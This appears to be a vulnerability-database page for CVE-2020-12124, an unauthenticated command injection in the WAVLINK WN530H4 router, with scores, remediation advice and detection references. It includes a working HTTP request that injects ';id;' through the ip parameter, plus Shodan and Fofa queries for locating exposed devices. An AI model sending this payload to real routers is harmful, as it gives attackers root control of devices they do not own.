🔙 목록으로 돌아가기

CVE-2020-12124: WAVLINK WN530H4 live_api.cgi - Command Injection

TitleWAVLINK WN530H4 live_api.cgi - Command Injection
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary Linux commands as root on the WAVLINK WN530H4 device, potentially leading to complete system compromise, data theft, or using the device as a pivot point for further attacks.
RemediationApply vendor security patches if available or replace the device with a secure alternative. Restrict access to the management interface.
CVSS Score9.8
EPSS Score0.91801
CVE IDCVE-2020-12124
CWE IDCWE-78
Shodan Queryhttp.html:"wavlink"
Fofa Querybody="wavlink"
Tags cve cve2020 rce wavlink vkev vuln

🔍 Vulnerability Description

A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.

🌐 HTTP Request

GET /cgi-bin/live_api.cgi?page=7BZ&id=8240&ip=;id; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12124.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-12124.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A